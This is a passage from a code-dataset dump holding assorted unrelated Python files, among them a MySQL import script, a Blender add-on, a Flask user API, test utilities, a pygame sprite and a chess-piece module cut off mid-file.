amber))\n","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"382982622","text":"#!/usr/bin/env python3\r\n#-*- coding:utf-8 -*-\r\n\r\n'the script of create Mysql-table'\r\n\r\n__author__='jcm'\r\n\r\nimport sys\r\nfrom class_of_Mysql import Mysql\r\nfrom class_of_Xls import Xls\r\nfrom func_of_auto_insert import Auto_insert\r\nfrom func_of_create_tuple import create_tuple\r\n\r\n#建立连接数据库\r\ncase_Mysql=Mysql('qs','192.168.62.249','3306')\r\ncase_Mysql.connect('fangyuan')\r\n\r\n#建立Xls文件\r\ncase_Xls=Xls(input('请输入Xls文件路径:'),input('请输入读取sheet名:'))\r\ncase_table=case_Xls.openXls()\r\ncase_Mysql_table=input('请输入插入数据的表名:')\r\n\r\nfor row_number in case_Xls.no_insert:\r\n row_list=case_table.row_values(row_number)\r\n Auto_insert(\r\n #数据库对象\r\n case_Mysql,\r\n #数据库\r\n case_Mysql_table,\r\n #插入字段\r\n case_Xls.fields_tuple,\r\n #pid\r\n row_list[0],\r\n #楼盘\r\n row_list[1],\r\n #期\r\n create_tuple(row_list[2]),\r\n #栋\r\n create_tuple(row_list[3]),\r\n #座\r\n create_tuple(row_list[4]),\r\n #单元\r\n create_tuple(row_list[5]),\r\n #房号\r\n create_tuple(row_list[6]))\r\n 
\r\n#断开数据库\r\ncase_Mysql.disconnect()\r\n","sub_path":"DataManager/functions/data_process/script_of_create_Mysql-table.py","file_name":"script_of_create_Mysql-table.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"381864747","text":"import bpy\nimport platform\nfrom extensions_framework import util as efutil\nfrom bpy.types import AddonPreferences\nfrom bpy.props import StringProperty\nfrom . import common\n\nclass SORTAddonPreferences(AddonPreferences):\n bl_idname = common.preference_bl_name\n # this must match the addon name\n install_path = StringProperty(\n name=\"Path to SORT binary\",\n description='Path to SORT binary',\n subtype='DIR_PATH',\n default='',\n )\n\n install_path_debug = StringProperty(\n name='Path to SORT binary(debug)',\n description='Path to SORT binary(debug)',\n subtype='DIR_PATH',\n default='',\n )\n\n pbrt_export_path = StringProperty(\n name='Pbrt exporting path',\n description='Path to exported pbrt scene',\n subtype='DIR_PATH',\n default='',\n )\n\n def draw(self, context):\n layout = self.layout\n layout.prop(self, \"install_path\")\n layout.prop(self, \"install_path_debug\")\n layout.prop(self, \"pbrt_export_path\")\n\ndef get_sort_dir(force_debug=False):\n addon_prefs = bpy.context.user_preferences.addons[common.preference_bl_name].preferences\n debug = bpy.context.scene.debug_prop\n return_path = addon_prefs.install_path\n if debug is True:\n return_path = addon_prefs.install_path_debug\n if force_debug:\n return_path = addon_prefs.install_path_debug\n return efutil.filesystem_path(return_path) + \"/\"\n\ndef get_sort_bin_path(force_debug=False):\n sort_bin_dir = get_sort_dir(force_debug)\n if platform.system() == 'Darwin': # for Mac OS\n sort_bin_path = sort_bin_dir + \"sort\"\n elif platform.system() == 'Windows': # for Windows\n sort_bin_path = sort_bin_dir + \"sort.exe\"\n elif platform.system() == \"Linux\":\n sort_bin_path = sort_bin_dir + \"SORT\"\n else:\n raise Exception(\"SORT is only supported on Windows, Ubuntu and Mac OS\")\n return sort_bin_path\n\ndef get_immediate_dir(force_debug=False):\n sort_bin_dir = get_sort_dir(force_debug)\n immediate_dir = sort_bin_dir + 'blender_intermediate/'\n return immediate_dir\n\ndef get_immediate_res_dir(force_debug=False):\n return get_immediate_dir(force_debug) + 'res/'\n\ndef register():\n bpy.utils.register_class(SORTAddonPreferences)\n\ndef unregister():\n bpy.utils.unregister_class(SORTAddonPreferences)\n","sub_path":"sortblend/preference.py","file_name":"preference.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"397378344","text":"from flask_restful import Resource\nfrom flask_restful import abort\nfrom flask_restful import marshal_with, marshal\nfrom flask_restful import fields\nfrom flask_restful import reqparse\nfrom app.db import dbs\nfrom app.models.user import User\nimport re\nfrom datetime import datetime\nfrom app.resources.auth import validate_protected_action_permission_jwt, validate_login_jwt, get_login_jwt\n\nuser_fields = {\n 'id': fields.Integer,\n 'firstname': fields.String,\n 'lastname': fields.String,\n 'nickname': fields.String,\n 'birthday': fields.DateTime,\n 'size': fields.Float,\n 'sex': fields.String,\n 'email': fields.String,\n 'administrator': fields.Boolean,\n 'moderator': fields.Boolean,\n 'uri': fields.Url('area', absolute=True),\n 'time_created': fields.DateTime,\n 
'time_updated': fields.DateTime\n}\n\nparser = reqparse.RequestParser()\nparser.add_argument('firstname')\nparser.add_argument('lastname')\nparser.add_argument('nickname')\nparser.add_argument('birthday')\nparser.add_argument('password')\nparser.add_argument('size', type=float)\nparser.add_argument('sex')\nparser.add_argument('email', required=True, help=\"Email cannot be blank!\")\nparser.add_argument('installAdmin', type=bool)\n\npromotion_parser = reqparse.RequestParser()\npromotion_parser.add_argument('promoteToAdmin', type=bool)\npromotion_parser.add_argument('promoteToMod', type=bool)\n\nsexes = [None, 'male', 'female']\n\n\nclass UserResource(Resource):\n @marshal_with(user_fields, envelope='data')\n def get(self, id):\n user = dbs.query(User).filter(User.id == id).first()\n if not user:\n abort(404, message=\"(Code 001) User {} doesn't exist\".format(id))\n if user.birthday:\n user.birthday = datetime.combine(user.birthday, datetime.min.time()) # Can't marshall date, only datetime\n return user\n\n @validate_protected_action_permission_jwt\n def delete(self, id, **kwargs):\n if kwargs['protected_action_permission'] != 'delete':\n abort(401, message='(Code 025) Wrong permissions!')\n user = dbs.query(User).filter(User.id == id).first()\n if not user:\n abort(404, message=\"(Code 002) User {} doesn't exist\".format(id))\n dbs.delete(user)\n dbs.commit()\n return {}, 204\n\n @validate_protected_action_permission_jwt\n @validate_login_jwt\n def put(self, id, **kwargs):\n parsed_args = parser.parse_args()\n\n if not (parsed_args['nickname'] or (parsed_args['firstname'] and parsed_args['lastname'])):\n abort(400, message=\"(Code 003) Either a nickname or a firstname and lastname need to be given!\")\n\n if not re.match(r\"[^@]+@[^@]+\\.[^@]+\", parsed_args['email']):\n abort(400, message=\"(Code 004) Email field is invalid!\")\n\n if not parsed_args['sex'] in sexes:\n abort(400, message=\"(Code 027) Invalid sex!\")\n\n user = dbs.query(User).filter(User.id == id).first()\n\n if not user:\n abort(404, message=\"(Code 080) User {} doesn't exist\".format(id))\n\n if kwargs['user'].email != user.email:\n abort(401, message=\"(Code 005) Unauthorized!\")\n\n user.firstname = parsed_args['firstname']\n user.lastname = parsed_args['lastname']\n user.nickname = parsed_args['nickname']\n user.size = parsed_args['size']\n user.sex = parsed_args['sex']\n user.birthday = datetime.strptime(parsed_args['birthday'], '%Y-%m-%d') if parsed_args[\n 'birthday'] else None\n if user.email != parsed_args['email']: # Changing the email address needs special permissions\n if kwargs['protected_action_permission'] != 'put':\n abort(401, message='(Code 006) Unauthorized!')\n else:\n user.email = parsed_args['email']\n generate_refreshed_jwt = True\n else:\n generate_refreshed_jwt = False\n if parsed_args['password']: # So does changing the password\n if kwargs['protected_action_permission'] != 'put':\n abort(401, message='(Code 007) Unauthorized!')\n else:\n user.password = parsed_args['password']\n dbs.add(user)\n dbs.commit()\n if user.birthday:\n user.birthday = datetime.combine(user.birthday, datetime.min.time()) # Can't marshall date, only datetime\n marshalled_response = marshal(user, user_fields, envelope='data')\n # When email changed, the login JWT is now invalid and a new one has to be sent\n if generate_refreshed_jwt:\n marshalled_response['refreshedJWT'] = get_login_jwt(user.email)\n return marshalled_response, 201\n\n\nclass UserListResource(Resource):\n @marshal_with(user_fields, envelope='data')\n 
def get(self):\n users = dbs.query(User).all()\n for user in users:\n if user.birthday:\n user.birthday = datetime.combine(user.birthday, datetime.min.time())\n return users\n\n @marshal_with(user_fields, envelope='data')\n def post(self):\n parsed_args = parser.parse_args()\n\n # If there is not admin in the system yet, an admin can be created this way. This will only work for the first\n # admin in the system!\n is_admin = False\n if parsed_args['installAdmin']:\n if not dbs.query(User).filter(User.administrator).all():\n is_admin = True\n else:\n abort(401, message=\"(Code 036) Falsely attempted to create initial administrator!\")\n\n if not (parsed_args['nickname'] or (parsed_args['firstname'] and parsed_args['lastname'])):\n abort(400, message=\"(Code 008) Either a nickname or a firstname and lastname need to be given!\")\n if not re.match(r\"[^@]+@[^@]+\\.[^@]+\", parsed_args['email']):\n abort(400, message=\"(Code 009) Email field is invalid!\")\n if not parsed_args['password']:\n abort(400, message=\"(Code 010) Password cannot be blank!\")\n if not parsed_args['sex'] in sexes:\n abort(400, message=\"(Code 026) Invalid sex!\")\n\n birthday = datetime.strptime(parsed_args['birthday'], '%Y-%m-%d') if parsed_args[\n 'birthday'] else None\n user = User(firstname=parsed_args['firstname'],\n lastname=parsed_args['lastname'],\n nickname=parsed_args['nickname'],\n birthday=birthday,\n size=parsed_args['size'],\n sex=parsed_args['sex'],\n email=parsed_args['email'],\n password=parsed_args['password'],\n administrator=is_admin,\n moderator=is_admin)\n dbs.add(user)\n dbs.commit()\n if user.birthday:\n user.birthday = datetime.combine(user.birthday, datetime.min.time()) # Can't marshall date, only datetime\n return user, 201\n\n\nclass PromotionResource(Resource):\n @marshal_with(user_fields, envelope='data')\n @validate_login_jwt\n def put(self, id, **kwargs):\n parsed_args = promotion_parser.parse_args()\n user = dbs.query(User).filter(User.id == id).first()\n if not user:\n abort(404, message=\"(Code 037) User {} doesn't exist\".format(id))\n if parsed_args['promoteToAdmin']:\n if user.administrator:\n abort(404, message=\"(Code 040) User is already an administrator!\")\n else:\n if kwargs['user'].administrator:\n user.administrator = True\n user.moderator = True\n else:\n abort(401, message=\"(Code 038) Unauthorized!\")\n if parsed_args['promoteToMod']:\n if user.administrator:\n abort(404, message=\"(Code 041) User is already an administrator!\")\n elif user.moderator:\n abort(404, message=\"(Code 042) User is already a moderator!\")\n else:\n if kwargs['user'].moderator or kwargs['user'].administrator:\n user.moderator = True\n else:\n abort(401, message=\"(Code 039) Unauthorized!\")\n dbs.add(user)\n dbs.commit()\n return user, 201\n","sub_path":"server/app/resources/user.py","file_name":"user.py","file_ext":"py","file_size_in_byte":8215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"306937588","text":"from logging import StreamHandler, DEBUG, Formatter, FileHandler, getLogger\nlogger = getLogger(__name__)\n\nDIR = 'result_tmp/'\n\nlog_fmt = Formatter('%(asctime)s %(name)s %(lineno)d [%(levelname)s][%(funcName)s] %(message)s ')\nhandler = StreamHandler()\nhandler.setLevel('INFO')\nhandler.setFormatter(log_fmt)\nlogger.addHandler(handler)\n\nhandler = FileHandler(DIR + 'test.log', 
'a')\nhandler.setLevel(DEBUG)\nhandler.setFormatter(log_fmt)\nlogger.setLevel(DEBUG)\nlogger.addHandler(handler)\n","sub_path":"debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"443569067","text":"__copyright__ = \"Copyright (c) 2020 Jina AI Limited. All rights reserved.\"\n__license__ = \"Apache-2.0\"\n\nfrom typing import Optional\n\nfrom . import FlatRecursiveMixin, BaseExecutableDriver, DocsExtractUpdateMixin\n\n\nclass CraftDriver(DocsExtractUpdateMixin, FlatRecursiveMixin, BaseExecutableDriver):\n \"\"\"Drivers inherited from this Driver will bind :meth:`craft` by default \"\"\"\n\n def __init__(\n self, executor: Optional[str] = None, method: str = 'craft', *args, **kwargs\n ):\n super().__init__(executor, method, *args, **kwargs)\n\n @property\n def _stack_document_content(self):\n return False\n","sub_path":"jina/drivers/craft.py","file_name":"craft.py","file_ext":"py","file_size_in_byte":625,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"474244059","text":"# coding: utf-8\nfrom unittest import TestCase as UnitTestCase\nfrom .models import Food\nfrom mytaggit.models import Tag\n\n\nclass FoodTestCase(UnitTestCase):\n\n def test_slug(self):\n food = Food.objects.create()\n food.tags.add('沖縄')\n self.assertEqual(1, Tag.objects.count())\n tag = food.tags.first()\n self.assertEqual(tag.slug, 'okinawa')\n\n def test_unique_slug(self):\n food = Food.objects.create()\n food.tags.add(\n '無常', '無情',\n )\n tags = list(food.tags.all())\n self.assertTrue(tags[1].slug.startswith(tags[0].slug))\n","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"130489381","text":"import importlib\nimport os\nimport pkgutil\nimport re\nimport shutil\nimport tempfile\nimport time\nfrom contextlib import contextmanager\nfrom functools import wraps\nfrom inspect import getmembers, getmodule, isclass, isfunction, ismethod, ismodule\nfrom itertools import zip_longest\nfrom typing import Any, Callable, Dict, Iterator, List, NamedTuple, Optional, Type\n\nimport sqlalchemy.event\n\nfrom redun import Scheduler\n\n\ndef clean_dir(path: str) -> None:\n \"\"\"\n Ensure path exists and is an empty directory.\n \"\"\"\n if os.path.exists(path):\n shutil.rmtree(path)\n os.makedirs(path)\n\n\ndef get_test_file(filename: str) -> str:\n \"\"\"\n Returns a file from test_data.\n \"\"\"\n basedir = os.path.dirname(__file__)\n return os.path.join(basedir, filename)\n\n\ndef use_tempdir(func: Callable) -> Callable:\n \"\"\"\n Run function within a temporary directory.\n \"\"\"\n\n @wraps(func)\n def wrap(*args: Any, **kwargs: Any) -> Any:\n with tempfile.TemporaryDirectory() as tmpdir:\n original_dir = os.getcwd()\n os.chdir(tmpdir)\n\n try:\n result = func(*args, **kwargs)\n finally:\n os.chdir(original_dir)\n return result\n\n return wrap\n\n\ndef assert_match_lines(patterns: List[str], lines: List[str]) -> None:\n \"\"\"\n Asserts whether `lines` match `patterns`.\n \"\"\"\n assert len(patterns) == len(lines)\n for pattern, line in zip(patterns, lines):\n assert re.fullmatch(pattern, line)\n\n\ndef assert_match_text(pattern: str, text: str, wildcard: str = \"*\"):\n \"\"\"\n Assert whether two strings are equal using wildcards.\n \"\"\"\n for i, (a, b) in enumerate(zip_longest(pattern, text)):\n if a != 
b and a != wildcard:\n assert False, \"mismatch on character {}: '{}' != '{}'\".format(\n i, pattern[: i + 1], text[: i + 1]\n )\n\n\ndef wait_until(cond: Callable[[], bool], interval: float = 0.02, timeout: float = 1.0) -> None:\n \"\"\"\n Wait until `cond()` is True or timeout is exceeded.\n \"\"\"\n start = time.time()\n while not cond():\n if time.time() - start > timeout:\n raise RuntimeError(\"Timeout\")\n time.sleep(interval)\n\n\nclass MatchEnv:\n \"\"\"\n\n An environment for generating Match objects.\n \"\"\"\n\n def __init__(self):\n self.vars: Dict[str, Any] = {}\n\n def match(self, *args, **kwargs) -> \"Match\":\n kwargs[\"env\"] = self\n return Match(*args, **kwargs)\n\n\nclass Match:\n \"\"\"\n Helper for asserting values have particular properties (types, etc).\n \"\"\"\n\n def __init__(\n self,\n type: Optional[Type] = None,\n var: Optional[str] = None,\n regex: Optional[str] = None,\n any: bool = True,\n env: Optional[MatchEnv] = None,\n ):\n self.any = any\n self.type = type\n self.var = var\n self.regex = regex\n self.env = env\n\n def __repr__(self) -> str:\n if self.var:\n return \"Match(var={})\".format(self.var)\n elif self.type:\n return \"Match(type={})\".format(self.type.__name__)\n elif self.regex:\n return \"Match(regex={})\".format(self.regex)\n elif self.any:\n return \"Match(any=True)\"\n else:\n return \"Match()\"\n\n def __eq__(self, other: Any) -> bool:\n if self.env and self.var:\n # First instance of var will always return True.\n # Second instance of var has to match previous value.\n expected = self.env.vars.setdefault(self.var, other)\n if expected != other:\n return False\n\n if self.type:\n return isinstance(other, self.type)\n\n elif self.regex:\n return bool(re.fullmatch(self.regex, other))\n\n else:\n return self.any\n\n\nclass QueryStats(NamedTuple):\n \"\"\"\n Stats for a recorded SQLAlchemy query.\n \"\"\"\n\n statement: str\n parameters: tuple\n duration: float\n\n\n@contextmanager\ndef listen_queries(engine: Any) -> Iterator[List[QueryStats]]:\n \"\"\"\n Context for capturing SQLAlchemy queries.\n\n .. 
code-block:: python\n\n with listen_queries(engine) as queries:\n result = session.query(Model).filter(...)\n # More SQLAlchemy queries...\n\n # queries now has a list of statement and parameter tuples.\n assert len(queries) == 2\n \"\"\"\n queries = []\n cursors = {}\n\n def before(conn, cursor, statement, parameters, context, executemany):\n cursors[cursor] = time.time()\n\n def after(conn, cursor, statement, parameters, context, executemany):\n duration = time.time() - cursors.pop(cursor)\n queries.append(QueryStats(statement, parameters, duration))\n\n sqlalchemy.event.listen(engine, \"before_cursor_execute\", before)\n sqlalchemy.event.listen(engine, \"after_cursor_execute\", after)\n\n yield queries\n\n sqlalchemy.event.remove(engine, \"before_cursor_execute\", before)\n sqlalchemy.event.remove(engine, \"after_cursor_execute\", after)\n\n\ndef import_all_modules(pkg):\n \"\"\"Import (almost) all modules within a package.\n\n Ignores explicitly marked modules.\n \"\"\"\n ignored_modules = (\"redun.backends.db.alembic.env\",) # https://stackoverflow.com/a/52575218\n modules = []\n for _, module_name, is_pkg in pkgutil.iter_modules(pkg.__path__):\n full_name = f\"{pkg.__name__}.{module_name}\"\n if full_name in ignored_modules:\n continue\n\n module = importlib.import_module(full_name)\n if is_pkg:\n modules.extend(import_all_modules(module))\n else:\n modules.append(module)\n\n return modules\n\n\ndef get_docstring_owners_in_module(module):\n \"\"\"Get all functions, classes and their methods defined within a python module.\n\n Returns\n -------\n docstring_owners : set\n Set of functions, classes and methods\n \"\"\"\n assert ismodule(module), f\"Passed {module.__name__} which is not a module.\"\n\n def is_valid(obj):\n if getmodule(obj) == module:\n if ismethod(obj) or isfunction(obj):\n return not obj.__name__.startswith(\"_\")\n if isclass(obj):\n return True\n return False\n\n to_check = {obj for _, obj in getmembers(module) if is_valid(obj)}\n docstring_owners = set()\n seen = set()\n\n while to_check:\n candidate = to_check.pop()\n if candidate in seen:\n continue\n\n if isfunction(candidate) or ismethod(candidate):\n docstring_owners.add(candidate)\n\n if isclass(candidate):\n to_check.update({obj for _, obj in getmembers(candidate) if is_valid(obj)})\n\n seen.add(candidate)\n return docstring_owners\n\n\ndef docstring_owner_pretty_name(docstring_owner):\n return \".\".join((docstring_owner.__module__, docstring_owner.__qualname__))\n\n\ndef mock_scheduler():\n \"\"\"\n Returns a scheduler with mocks for job completion.\n \"\"\"\n # Setup scheduler callbacks.\n scheduler = Scheduler()\n\n scheduler.job_results = {}\n scheduler.job_errors = {}\n\n def done_job(job, result, job_tags=[]):\n job.job_tags.extend(job_tags)\n scheduler.job_results[job.id] = result\n\n def reject_job(job, error, error_traceback=None, job_tags=[]):\n if job:\n job.job_tags.extend(job_tags)\n scheduler.job_errors[job.id] = error\n else:\n # Scheduler error, reraise it.\n raise error\n\n def batch_wait(job_ids):\n while not all(\n job_id in scheduler.job_results or job_id in scheduler.job_errors for job_id in job_ids\n ):\n time.sleep(0.1)\n\n scheduler.done_job = done_job\n scheduler.reject_job = reject_job\n scheduler.batch_wait = batch_wait\n\n return scheduler\n","sub_path":"redun/tests/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":7777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"530216274","text":"import pygame\nfrom 
breakout.model.Bullet import Bullet\nfrom breakout.control.constants import COLOR_BLACK, COLOR_BALL\n\n\nclass Gun(pygame.sprite.Sprite):\n\n def __init__(self, color, width, height):\n super().__init__()\n self.image = pygame.Surface([width, height])\n self.image.fill(COLOR_BLACK)\n self.image.set_colorkey(COLOR_BLACK)\n self.rect = self.image.get_rect()\n pygame.draw.polygon(self.image, color, [self.rect.midtop, self.rect.bottomleft, self.rect.bottomright])\n\n self.fire_rate = 0\n self.MAX_FIRE_RATE = 80\n\n def fire(self, bullets):\n self.fire_rate += 1\n\n if self.fire_rate > self.MAX_FIRE_RATE:\n bullet = Bullet(COLOR_BALL, 7, 7)\n bullet.rect.centerx = self.rect.centerx\n bullet.rect.bottom = self.rect.top\n bullets.add(bullet)\n\n self.fire_rate = 0\n","sub_path":"breakout/model/Gun.py","file_name":"Gun.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"16774904","text":"from core.advbase import *\n\nclass Kimono_Luca(Adv):\n comment = 'mochi master not implemented'\n @allow_acl\n def s(self, n, s1_kind=None):\n if n == 1 and s1_kind == 'all':\n self.current_s['s1'] = 'all'\n else:\n self.current_s['s1'] = 'default'\n return super().s(n)\n\nvariants = {None: Kimono_Luca}\n","sub_path":"adv/kimono_luca.py","file_name":"kimono_luca.py","file_ext":"py","file_size_in_byte":346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"49904644","text":"def setup():\n default_creds_file = os.path.expanduser('~/.rackspace_cloud_credentials')\n env = get_config(p, 'rax', 'environment', 'RAX_ENV', None)\n if env:\n pyrax.set_environment(env)\n keyring_username = pyrax.get_setting('keyring_username')\n creds_file = get_config(p, 'rax', 'creds_file', 'RAX_CREDS_FILE', None)\n if (creds_file is not None):\n creds_file = os.path.expanduser(creds_file)\n elif os.path.isfile(default_creds_file):\n creds_file = default_creds_file\n elif (not keyring_username):\n sys.exit(('No value in environment variable %s and/or no credentials file at %s' % ('RAX_CREDS_FILE', default_creds_file)))\n identity_type = pyrax.get_setting('identity_type')\n pyrax.set_setting('identity_type', (identity_type or 'rackspace'))\n region = pyrax.get_setting('region')\n try:\n if keyring_username:\n pyrax.keyring_auth(keyring_username, region=region)\n else:\n pyrax.set_credential_file(creds_file, region=region)\n except Exception as e:\n sys.exit(('%s: %s' % (e, e.message)))\n regions = []\n if region:\n regions.append(region)\n else:\n try:\n region_list = get_config(p, 'rax', 'regions', 'RAX_REGION', 'all', value_type='list')\n except TypeError:\n region_list = get_config(p, 'rax', 'regions', 'RAX_REGION', 'all', islist=True)\n for region in region_list:\n region = region.strip().upper()\n if (region == 'ALL'):\n regions = pyrax.regions\n break\n elif (region not in pyrax.regions):\n sys.exit(('Unsupported region %s' % region))\n elif (region not in regions):\n regions.append(region)\n return regions","sub_path":"Data Set/bug-fixing-3/f7d9a734d5ad1add9bc18d19ccf32e123c972e44-<setup>-fix.py","file_name":"f7d9a734d5ad1add9bc18d19ccf32e123c972e44-<setup>-fix.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"208454862","text":"##Decode the logic and print the pattern that corresponds to the given input\n#SI 1 - 3\n#SO 1 \n# 10203010011012\n# **4050809\n# ****607\n\nn = 
int(input())\nline = 0\nk=n\nstart=1\nfin = n*(n+1)+1\nfor i in range(n):\n    print('**'*line, end='')\n    line+=1\n    for _ in range(k):\n        print(start,end='0')\n        start+=1\n    \n    for j in range(k,0,-1):\n        print(fin-j, end='')\n        if j!=1:\n            print(0,end='')\n    fin-=k\n    k-=1\n    print()\n","sub_path":"decode-logic-pattern.py","file_name":"decode-logic-pattern.py","file_ext":"py","file_size_in_byte":418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"}
+{"seq_id":"43819020","text":"# -*- coding: utf-8 -*-\r\n\"\"\"Module containing the base class Piece, as well as one child class for each type of chess piece.\r\n\r\n\"\"\"\r\n# TODO: If your system does not display the chess Unicode characters correctly,\r\n# set this constant (global variable) to False. A tutorial is available on the course\r\n# website to help you get Unicode characters working under Windows.\r\nUTILISER_UNICODE = True\r\n\r\n\r\nclass Piece:\r\n    \"\"\"A base class representing a chess piece. It is this class that is inherited below to provide\r\n    one class per piece type (Pion, Tour, etc.).\r\n\r\n    Attributes:\r\n        couleur (str): The colour of the piece, either 'blanc' or 'noir'.\r\n        peut_sauter (bool): Whether or not the piece can \"jump\" over other pieces on a board.\r\n\r\n    Args:\r\n        couleur (str): The colour with which to create the piece.\r\n        peut_sauter (bool): The value with which the peut_sauter attribute must be initialized.\r\n\r\n    \"\"\"\r\n    def __init__(self, couleur, peut_sauter):\r\n        # Check that the received colour is valid.\r\n        assert couleur in ('blanc', 'noir')\r\n\r\n        # Create the attributes with the received values.\r\n        self.couleur = couleur\r\n        self.peut_sauter = peut_sauter\r\n\r\n    def est_blanc(self):\r\n        \"\"\"Returns whether or not the piece is white.\r\n\r\n        Returns:\r\n            bool: True if the piece is white, and False otherwise.\r\n\r\n        \"\"\"\r\n        return self.couleur == 'blanc'\r\n\r\n    def est_noir(self):\r\n        \"\"\"Returns whether or not the piece is black.\r\n\r\n        Returns:\r\n            bool: True if the piece is black, and False otherwise.\r\n\r\n        \"\"\"\r\n        return self.couleur == 'noir'\r\n\r\n    def peut_se_deplacer_vers(self, position_source, position_cible):\r\n        \"\"\"Checks whether, according to the rules of chess, the piece can move from one position to another.\r\n\r\n        A position is a string of two characters.\r\n        The first character is a letter between a and h, representing the column of the board.\r\n        The second character is a digit between 1 and 8, representing the row of the board.\r\n\r\n        Args:\r\n            position_source (str): The source position, following the format above. For example, 'a8', 'f3', etc.\r\n            position_cible (str): The target position, following the format above. For example, 'b6', 'h1', etc.\r\n\r\n        Warning:\r\n            Since we are in the base class and not in one of the child classes, we do not (yet) know\r\n            how this piece moves. This method must therefore be redefined in each of the\r\n            child classes.\r\n\r\n        Warning:\r\n            Since the Piece class is independent of the board (and so we do not know whether a piece is\r\n            \"in the way\"), we must ignore the contents of the board: we focus only on the movement\r\n            rules of the pieces.\r\n\r\n        Returns:\r\n            bool: True if the move is valid according to the piece's rules, and False otherwise.\r\n\r\n        \"\"\"\r\n        # We raise an exception (we will come back to this) indicating that this code has not been implemented.\r\n        # Do not touch this method: reimplement it in the child classes!\r\n        raise NotImplementedError\r\n\r\n    def peut_faire_une_prise_vers(self, position_source, position_cible):\r\n        \"\"\"Checks whether, according to the rules of chess, the piece can \"eat\" (capture) an enemy piece.\r\n        For most pieces the rule is the same, so we call the peut_se_deplacer_vers method.\r\n\r\n        If that is not the case for a given piece, this method can simply be redefined to program\r\n        the rule.\r\n\r\n        Args:\r\n            position_source (str): The source position, following the format above. For example, 'a8', 'f3', etc.\r\n            position_cible (str): The target position, following the format above. For example, 'b6', 'h1', etc.\r\n\r\n        Returns:\r\n            bool: True if the capture is valid according to the piece's rules, and False otherwise.\r\n\r\n        \"\"\"\r\n        return self.peut_se_deplacer_vers(position_source, position_cible)\r\n\r\n\r\nclass Pion(Piece):\r\n    def __init__(self, couleur):\r\n        super().__init__(couleur, False)\r\n\r\n    def peut_se_deplacer_vers(self, position_source, position_cible):\r\n        colonne_source, colonne_cible = ord(position_source[0]), ord(position_cible[0])\r\n        rangee_source, rangee_cible = int(position_source[1]), int(position_cible[1])\r\n\r\n        # A pawn moves along a single column.\r\n        if colonne_cible != colonne_source:\r\n            return False\r\n\r\n        # If the pawn has never moved, it can move two squares. Otherwise, only one square.\r\n        # Note that this is the only place where we refer to the size of the board.\r\n        # To make our piece classes truly independent of this size, we could for\r\n        # example add an n_deplacements attribute, which would be incremented when the piece\r\n        # moves.\r\n        difference = rangee_source - rangee_cible\r\n        if self.est_blanc():\r\n            if rangee_source == 2:\r\n                return difference in (-1, -2)\r\n            else:\r\n                return difference == -1\r\n\r\n        else:\r\n            if rangee_source == 7:\r\n                return difference in (1, 2)\r\n            else:\r\n                return difference == 1\r\n\r\n    def peut_faire_une_prise_vers(self, position_source, position_cible):\r\n        colonne_source, colonne_cible = ord(position_source[0]), ord(position_cible[0])\r\n        rangee_source, rangee_cible = int(position_source[1]), int(position_cible[1])\r\n\r\n        # The pawn captures diagonally, one square only, and the direction depends\r\n        # on its colour.\r\n        if colonne_cible not in (colonne_source - 1, colonne_source + 1):\r\n            return False\r\n\r\n        if self.est_blanc():\r\n            return rangee_cible == rangee_source + 1\r\n\r\n        else:\r\n            return rangee_cible == rangee_source - 1\r\n\r\n    def __repr__(self):\r\n        \"\"\"Redefines how a pawn is displayed on screen. We use the UTILISER_UNICODE constant\r\n        to determine how to display the pawn.\r\n\r\n        Returns:\r\n            str: The string representing the pawn.\r\n\r\n        \"\"\"\r\n        if self.est_blanc():\r\n            if UTILISER_UNICODE:\r\n                return '\\u2659'\r\n            else:\r\n                return 'PB'\r\n        else:\r\n            if UTILISER_UNICODE:\r\n                return '\\u265f'\r\n            else:\r\n                return 'PN'\r\n\r\n\r\nclass Tour(Piece):\r\n    def __init__(self, couleur):\r\n        super().__init__(couleur, False)\r\n\r\n    def peut_se_deplacer_vers(self, position_source, position_cible):\r\n        colonne_source, colonne_cible = position_source[0], position_cible[0]\r\n        rangee_source, rangee_cible = position_source[1], position_cible[1]\r\n\r\n        # A rook moves along a single row or a single column, regardless of direction.\r\n        if colonne_cible != colonne_source and rangee_source != rangee_cible:\r\n            return False\r\n\r\n        # However, it cannot stay in place.\r\n        if colonne_source == colonne_cible and rangee_source == rangee_cible:\r\n            return False\r\n\r\n        return True\r\n\r\n    def __repr__(self):\r\n        if self.est_blanc():\r\n            if UTILISER_UNICODE:\r\n                return '\\u2656'\r\n            else:\r\n                return 'TB'\r\n        else:\r\n            if UTILISER_UNICODE:\r\n                return '\\u265c'\r\n            else:\r\n                return 'TN'\r\n\r\n\r\nclass Cavalier(Piece):\r\n    def __init__(self, couleur):\r\n        super().__init__(couleur, True)\r\n\r\n    def peut_se_deplacer_vers(self, position_source, position_cible):\r\n        colonne_source, colonne_cible = ord(position_source[0]), ord(position_cible[0])\r\n        rangee_source, rangee_cible = int(position_source[1]), int(position_cible[1])\r\n\r\n        # A knight moves in an \"L\" shape, so one of its coordinates must change by 1, and the other by 2.\r\n        distance_colonne = 